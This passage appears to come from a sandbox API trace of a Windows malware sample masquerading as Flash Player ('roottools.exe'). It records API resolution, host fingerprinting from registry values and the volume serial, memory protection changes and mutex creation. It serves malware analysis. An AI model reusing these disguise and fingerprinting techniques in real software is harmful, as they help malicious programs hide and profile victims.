(uMode=0x8001) returned 0x0 [0093.754] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0093.754] SetErrorMode (uMode=0x0) returned 0x8001 [0093.754] GetProcAddress (hModule=0x750d0000, lpProcName="wvnsprintfA") returned 0x750fedfe [0093.754] SetErrorMode (uMode=0x8001) returned 0x0 [0093.754] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0093.754] SetErrorMode (uMode=0x0) returned 0x8001 [0093.754] GetProcAddress (hModule=0x750d0000, lpProcName="PathIsDirectoryW") returned 0x750dff07 [0093.754] SetErrorMode (uMode=0x8001) returned 0x0 [0093.754] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0093.754] SetErrorMode (uMode=0x0) returned 0x8001 [0093.754] GetProcAddress (hModule=0x750d0000, lpProcName="PathRemoveBackslashW") returned 0x750e5c62 [0093.754] SetErrorMode (uMode=0x8001) returned 0x0 [0093.754] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0093.754] SetErrorMode (uMode=0x0) returned 0x8001 [0093.754] GetProcAddress (hModule=0x750d0000, lpProcName="UrlUnescapeA") returned 0x750fc6fb [0093.754] SetErrorMode (uMode=0x8001) returned 0x0 [0093.754] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0093.754] SetErrorMode (uMode=0x0) returned 0x8001 [0093.755] GetProcAddress (hModule=0x750d0000, lpProcName="PathQuoteSpacesW") returned 0x7510ce21 [0093.755] SetErrorMode (uMode=0x8001) returned 0x0 [0093.755] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x74eb0000 [0093.755] SetErrorMode (uMode=0x0) returned 0x8001 [0093.755] GetProcAddress (hModule=0x74eb0000, lpProcName="GetModuleFileNameExW") returned 0x74eb13f0 [0093.755] SetErrorMode (uMode=0x8001) returned 0x0 [0093.755] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75450000 [0093.755] SetErrorMode (uMode=0x0) returned 0x8001 [0093.755] GetProcAddress (hModule=0x75450000, lpProcName="CLSIDFromString") returned 0x7546e599 [0093.755] SetErrorMode (uMode=0x8001) returned 0x0 [0093.755] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75450000 [0093.756] SetErrorMode (uMode=0x0) returned 0x8001 [0093.756] GetProcAddress (hModule=0x75450000, lpProcName="CoInitializeEx") returned 0x754909ad [0093.756] SetErrorMode (uMode=0x8001) returned 0x0 [0093.756] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75450000 [0093.756] SetErrorMode (uMode=0x0) returned 0x8001 [0093.756] GetProcAddress (hModule=0x75450000, lpProcName="CreateStreamOnHGlobal") returned 0x7547363b [0093.756] SetErrorMode (uMode=0x8001) returned 0x0 [0093.756] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75450000 [0093.756] SetErrorMode (uMode=0x0) returned 0x8001 [0093.756] GetProcAddress (hModule=0x75450000, lpProcName="CoSetProxyBlanket") returned 0x75465ea5 [0093.756] SetErrorMode (uMode=0x8001) returned 0x0 [0093.756] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75450000 [0093.756] SetErrorMode (uMode=0x0) returned 0x8001 [0093.756] GetProcAddress (hModule=0x75450000, lpProcName="CoCreateInstance") returned 0x75499d0b [0093.756] SetErrorMode (uMode=0x8001) returned 0x0 [0093.756] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75450000 [0093.756] SetErrorMode (uMode=0x0) returned 0x8001 [0093.757] GetProcAddress (hModule=0x75450000, lpProcName="CoUninitialize") returned 0x754986d3 [0093.757] SetErrorMode (uMode=0x8001) returned 0x0 [0093.757] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75130000 [0093.757] SetErrorMode (uMode=0x0) returned 0x8001 [0093.757] GetProcAddress (hModule=0x75130000, lpProcName="DeleteObject") returned 0x75145689 [0093.757] SetErrorMode (uMode=0x8001) returned 0x0 [0093.757] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75130000 [0093.757] SetErrorMode (uMode=0x0) returned 0x8001 [0093.757] GetProcAddress (hModule=0x75130000, lpProcName="GetDeviceCaps") returned 0x75144de0 [0093.757] SetErrorMode (uMode=0x8001) returned 0x0 [0093.757] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75130000 [0093.757] SetErrorMode (uMode=0x0) returned 0x8001 [0093.757] GetProcAddress (hModule=0x75130000, lpProcName="CreateDCW") returned 0x7514e743 [0093.757] SetErrorMode (uMode=0x8001) returned 0x0 [0093.757] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75130000 [0093.757] SetErrorMode (uMode=0x0) returned 0x8001 [0093.757] GetProcAddress (hModule=0x75130000, lpProcName="CreateCompatibleDC") returned 0x751454f4 [0093.757] SetErrorMode (uMode=0x8001) returned 0x0 [0093.757] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75130000 [0093.758] SetErrorMode (uMode=0x0) returned 0x8001 [0093.758] GetProcAddress (hModule=0x75130000, lpProcName="SelectObject") returned 0x75144f70 [0093.758] SetErrorMode (uMode=0x8001) returned 0x0 [0093.758] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75130000 [0093.758] SetErrorMode (uMode=0x0) returned 0x8001 [0093.758] GetProcAddress (hModule=0x75130000, lpProcName="CreateCompatibleBitmap") returned 0x75145f49 [0093.758] SetErrorMode (uMode=0x8001) returned 0x0 [0093.758] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75130000 [0093.758] SetErrorMode (uMode=0x0) returned 0x8001 [0093.758] GetProcAddress (hModule=0x75130000, lpProcName="BitBlt") returned 0x75145ea6 [0093.758] SetErrorMode (uMode=0x8001) returned 0x0 [0093.758] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75130000 [0093.758] SetErrorMode (uMode=0x0) returned 0x8001 [0093.758] GetProcAddress (hModule=0x75130000, lpProcName="DeleteDC") returned 0x751458b3 [0093.758] SetErrorMode (uMode=0x8001) returned 0x0 [0093.758] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0093.760] SetErrorMode (uMode=0x0) returned 0x8001 [0093.761] GetProcAddress (hModule=0x75350000, lpProcName="InternetConnectA") returned 0x753749e9 [0093.761] SetErrorMode (uMode=0x8001) returned 0x0 [0093.761] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0093.761] SetErrorMode (uMode=0x0) returned 0x8001 [0093.761] GetProcAddress (hModule=0x75350000, lpProcName="InternetReadFile") returned 0x7536b406 [0093.761] SetErrorMode (uMode=0x8001) returned 0x0 [0093.761] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0093.761] SetErrorMode (uMode=0x0) returned 0x8001 [0093.761] GetProcAddress (hModule=0x75350000, lpProcName="HttpQueryInfoA") returned 0x7536a33e [0093.761] SetErrorMode (uMode=0x8001) returned 0x0 [0093.761] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0093.761] SetErrorMode (uMode=0x0) returned 0x8001 [0093.761] GetProcAddress (hModule=0x75350000, lpProcName="InternetQueryOptionA") returned 0x75361b56 [0093.761] SetErrorMode (uMode=0x8001) returned 0x0 [0093.761] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0093.761] SetErrorMode (uMode=0x0) returned 0x8001 [0093.762] GetProcAddress (hModule=0x75350000, lpProcName="HttpOpenRequestA") returned 0x75374c7d [0093.762] SetErrorMode (uMode=0x8001) returned 0x0 [0093.762] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0093.762] SetErrorMode (uMode=0x0) returned 0x8001 [0093.762] GetProcAddress (hModule=0x75350000, lpProcName="InternetCrackUrlA") returned 0x7535d075 [0093.762] SetErrorMode (uMode=0x8001) returned 0x0 [0093.762] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0093.762] SetErrorMode (uMode=0x0) returned 0x8001 [0093.762] GetProcAddress (hModule=0x75350000, lpProcName="InternetSetOptionA") returned 0x753675e8 [0093.762] SetErrorMode (uMode=0x8001) returned 0x0 [0093.762] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0093.762] SetErrorMode (uMode=0x0) returned 0x8001 [0093.762] GetProcAddress (hModule=0x75350000, lpProcName="InternetOpenA") returned 0x7537f18e [0093.762] SetErrorMode (uMode=0x8001) returned 0x0 [0093.762] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0093.762] SetErrorMode (uMode=0x0) returned 0x8001 [0093.762] GetProcAddress (hModule=0x75350000, lpProcName="InternetCloseHandle") returned 0x7536ab49 [0093.762] SetErrorMode (uMode=0x8001) returned 0x0 [0093.762] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0093.763] SetErrorMode (uMode=0x0) returned 0x8001 [0093.763] GetProcAddress (hModule=0x75350000, lpProcName="HttpSendRequestA") returned 0x753e18f8 [0093.763] SetErrorMode (uMode=0x8001) returned 0x0 [0093.763] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76c40000 [0093.763] SetErrorMode (uMode=0x0) returned 0x8001 [0093.765] GetProcAddress (hModule=0x76c40000, lpProcName="ObtainUserAgentString") returned 0x76c71d76 [0093.765] SetErrorMode (uMode=0x8001) returned 0x0 [0093.765] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76b60000 [0093.765] SetErrorMode (uMode=0x0) returned 0x8001 [0093.765] GetProcAddress (hModule=0x76b60000, lpProcName=0x9) returned 0x76b63eae [0093.765] SetErrorMode (uMode=0x8001) returned 0x0 [0093.765] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x748e0000 [0093.766] SetErrorMode (uMode=0x0) returned 0x8001 [0093.766] GetProcAddress (hModule=0x748e0000, lpProcName="GetUserNameExW") returned 0x74dea415 [0093.766] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x72940000, dwSize=0x120000, flNewProtect=0x40, lpflOldProtect=0x3530c00 | out: lpflOldProtect=0x3530c00*=0x2) returned 1 [0093.768] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x401000, dwSize=0xf20f, flNewProtect=0x20, lpflOldProtect=0x3530c00 | out: lpflOldProtect=0x3530c00*=0x40) returned 1 [0093.768] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x411000, dwSize=0x2bfe, flNewProtect=0x4, lpflOldProtect=0x3530c00 | out: lpflOldProtect=0x3530c00*=0x40) returned 1 [0093.768] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x414000, dwSize=0x696c, flNewProtect=0x4, lpflOldProtect=0x3530c00 | out: lpflOldProtect=0x3530c00*=0x40) returned 1 [0093.768] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x41b000, dwSize=0xc08, flNewProtect=0x4, lpflOldProtect=0x3530c00 | out: lpflOldProtect=0x3530c00*=0x40) returned 1 [0093.768] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x400000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x3530c00 | out: lpflOldProtect=0x3530c00*=0x40) returned 1 [0093.768] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0093.768] GetCurrentProcessId () returned 0x7a8 [0093.770] CryptAcquireContextW (in: phProv=0x417e5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x417e5c*=0x5bf638) returned 1 [0093.779] RtlAddVectoredExceptionHandler (FirstHandler=0x1, VectoredHandler=0x4084e9) returned 0x5bcfd8 [0093.779] GetComputerNameW (in: lpBuffer=0x18fcc8, nSize=0x18fcac | out: lpBuffer="YKYD69Q", nSize=0x18fcac) returned 1 [0093.780] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x18fc80 | out: phkResult=0x18fc80*=0x134) returned 0x0 [0093.780] RegQueryValueExW (in: hKey=0x134, lpValueName="InstallDate", lpReserved=0x0, lpType=0x18fcb4, lpData=0x18fcb0, lpcbData=0x18fc7c*=0x4 | out: lpType=0x18fcb4*=0x4, lpData=0x18fcb0*=0x0, lpcbData=0x18fc7c*=0x4) returned 0x0 [0093.780] RegCloseKey (hKey=0x134) returned 0x0 [0093.780] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x18fc84 | out: phkResult=0x18fc84*=0x134) returned 0x0 [0093.780] RegQueryValueExW (in: hKey=0x134, lpValueName="DigitalProductId", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x18fc98*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x18fc98*=0x0) returned 0x2 [0093.780] RegCloseKey (hKey=0x134) returned 0x0 [0093.780] GetVersionExW (in: lpVersionInformation=0x18fd08*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fd08*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0093.780] GlobalMemoryStatusEx (in: lpBuffer=0x18fe60 | out: lpBuffer=0x18fe60) returned 1 [0093.780] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18fe38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fe38*=0x705ba84c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0093.780] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff68 | out: Wow64Process=0x18ff68) returned 1 [0093.780] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x4177f0, dwRevision=0x1 | out: pSecurityDescriptor=0x4177f0) returned 1 [0093.780] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x4177f0, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x4177f0) returned 1 [0093.780] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0093.781] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5bc060, lpbSaclPresent=0x18f4e0, pSacl=0x18f4e8, lpbSaclDefaulted=0x18f4e4 | out: lpbSaclPresent=0x18f4e0, pSacl=0x18f4e8, lpbSaclDefaulted=0x18f4e4) returned 1 [0093.781] SetSecurityDescriptorSacl (in: pSecurityDescriptor=0x4177f0, bSaclPresent=1, pSacl=0x5bc074, bSaclDefaulted=0 | out: pSecurityDescriptor=0x4177f0) returned 1 [0093.781] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x18f220 | out: pszPath="C:\\Windows") returned 0x0 [0093.783] PathAddBackslashW (in: pszPath="C:\\Windows" | out: pszPath="C:\\Windows\\") returned="" [0093.783] GetVolumeNameForVolumeMountPointW (in: lpszVolumeMountPoint="C:\\Windows\\", lpszVolumeName=0x18f428, cchBufferLength=0x64 | out: lpszVolumeName="") returned 0 [0093.783] PathRemoveBackslashW (in: pszPath="C:\\Windows\\" | out: pszPath="C:\\Windows") returned="" [0093.783] PathRemoveFileSpecW (in: pszPath="C:\\Windows" | out: pszPath="C:\\") returned 1 [0093.783] PathAddBackslashW (in: pszPath="C:\\" | out: pszPath="C:\\") returned="" [0093.783] GetVolumeNameForVolumeMountPointW (in: lpszVolumeMountPoint="C:\\", lpszVolumeName=0x18f428, cchBufferLength=0x64 | out: lpszVolumeName="\\\\?\\Volume{bb11c9c2-5dad-11e7-a275-806e6f6e6963}\\") returned 1 [0093.783] CLSIDFromString (in: lpsz="{bb11c9c2-5dad-11e7-a275-806e6f6e6963}", pclsid=0x417a28 | out: pclsid=0x417a28*(Data1=0xbb11c9c2, Data2=0x5dad, Data3=0x11e7, Data4=([0]=0xa2, [1]=0x75, [2]=0x80, [3]=0x6e, [4]=0x6f, [5]=0x6e, [6]=0x69, [7]=0x63))) returned 0x0 [0093.784] GetVersionExW (in: lpVersionInformation=0x18f3d4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x772a3472, dwMinorVersion=0x0, dwBuildNumber=0x5c6950, dwPlatformId=0x0, szCSDVersion="ⴼ疠ⴼ疠") | out: lpVersionInformation=0x18f3d4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0093.784] GetVersionExW (in: lpVersionInformation=0x18f3c0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x18f478, dwMinorVersion=0x407dfd, dwBuildNumber=0x6, dwPlatformId=0x0, szCSDVersion="Ĝ") | out: lpVersionInformation=0x18f3c0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0093.784] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x18f4ec | out: TokenHandle=0x18f4ec*=0x13c) returned 1 [0093.784] GetTokenInformation (in: TokenHandle=0x13c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18f4e8 | out: TokenInformation=0x0, ReturnLength=0x18f4e8) returned 0 [0093.784] GetLastError () returned 0x7a [0093.784] GetTokenInformation (in: TokenHandle=0x13c, TokenInformationClass=0x19, TokenInformation=0xb79f9b0, TokenInformationLength=0x14, ReturnLength=0x18f4e8 | out: TokenInformation=0xb79f9b0, ReturnLength=0x18f4e8) returned 1 [0093.784] GetSidSubAuthorityCount (pSid=0xb79f9b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xb79f9b9 [0093.784] GetSidSubAuthority (pSid=0xb79f9b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xb79f9c0 [0093.784] CloseHandle (hObject=0x13c) returned 1 [0093.784] CreateEventW (lpEventAttributes=0x4177e4, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x13c [0093.784] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18ff64 | out: TokenHandle=0x18ff64*=0x140) returned 1 [0093.784] GetTokenInformation (in: TokenHandle=0x140, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18ff4c | out: TokenInformation=0x0, ReturnLength=0x18ff4c) returned 0 [0093.784] GetLastError () returned 0x7a [0093.784] GetTokenInformation (in: TokenHandle=0x140, TokenInformationClass=0x1, TokenInformation=0xb79f9b0, TokenInformationLength=0x24, ReturnLength=0x18ff4c | out: TokenInformation=0xb79f9b0, ReturnLength=0x18ff4c) returned 1 [0093.784] GetTokenInformation (in: TokenHandle=0x140, TokenInformationClass=0xc, TokenInformation=0x4177e0, TokenInformationLength=0x4, ReturnLength=0x18ff60 | out: TokenInformation=0x4177e0, ReturnLength=0x18ff60) returned 1 [0093.784] CloseHandle (hObject=0x140) returned 1 [0093.784] GetLengthSid (pSid=0xb79f9b8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0093.784] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x417810 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0093.785] PathRemoveBackslashW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned="g" [0093.785] GetCurrentProcess () returned 0xffffffff [0093.785] GetModuleFileNameExW (in: hProcess=0xffffffff, hModule=0x0, lpFilename=0x18fd64, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe")) returned 0x6e [0093.785] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77270000 [0093.785] GetProcAddress (hModule=0x77270000, lpProcName="RtlDosPathNameToNtPathName_U") returned 0x772cce41 [0093.785] GetProcAddress (hModule=0x77270000, lpProcName="NtCreateFile") returned 0x772900a4 [0093.786] GetProcAddress (hModule=0x77270000, lpProcName="NtClose") returned 0x7728f9d0 [0093.786] GetProcAddress (hModule=0x77270000, lpProcName="NtQueryEaFile") returned 0x77291314 [0093.786] GetProcAddress (hModule=0x77270000, lpProcName="NtSetEaFile") returned 0x772919b0 [0093.786] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", NtPathName=0x18f880, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0093.786] NtCreateFile (in: FileHandle=0x18f874, DesiredAccess=0x8, ObjectAttributes=0x18f888*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x18f878, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x40, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x18f874*=0x14c, IoStatusBlock=0x18f878*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0093.786] NtQueryEaFile (in: FileHandle=0x14c, IoStatusBlock=0x18f878, Buffer=0xb79fb08, Length=0x409, ReturnSingleEntry=1, EaList=0x0, EaListLength=0x0, EaIndex=0x0, RestartScan=0 | out: IoStatusBlock=0x18f878, Buffer=0xb79fb08) returned 0x0 [0093.786] NtClose (Handle=0x14c) returned 0x0 [0093.786] StrCmpNIW (lpStr1="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpStr2="C:\\Users\\aETAdzjz\\AppData\\Roaming", nChar=33) returned 0 [0093.786] lstrcmpiW (lpString1="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", lpString2="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 0 [0093.786] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="C2") returned 2 [0093.786] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="E6") returned 2 [0093.786] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="EC") returned 2 [0093.786] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="E9") returned 2 [0093.786] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="93") returned 2 [0093.786] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="8A") returned 2 [0093.786] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="43") returned 2 [0093.786] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="20") returned 2 [0093.786] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="6F") returned 2 [0093.786] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="17") returned 2 [0093.786] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="2A") returned 2 [0093.786] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="85") returned 2 [0093.786] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="68") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="4E") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="36") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="DB") returned 2 [0093.787] CreateMutexW (lpMutexAttributes=0x4177e4, bInitialOwner=1, lpName="C2E6ECE9938A43206F172A85684E36DB") returned 0x14c [0093.787] GetLastError () returned 0x0 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="9B") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="4D") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="68") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="96") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="17") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="31") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="FE") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="3C") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="22") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="DA") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="08") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="B6") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="40") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="79") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="9E") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="B6") returned 2 [0093.787] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="9B4D68961731FE3C22DA08B640799EB6") returned 0x148 [0093.787] CloseHandle (hObject=0x148) returned 1 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="7F") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="0E") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="6C") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="A1") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="75") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="D0") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="AD") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="DE") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="F9") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="23") returned 2 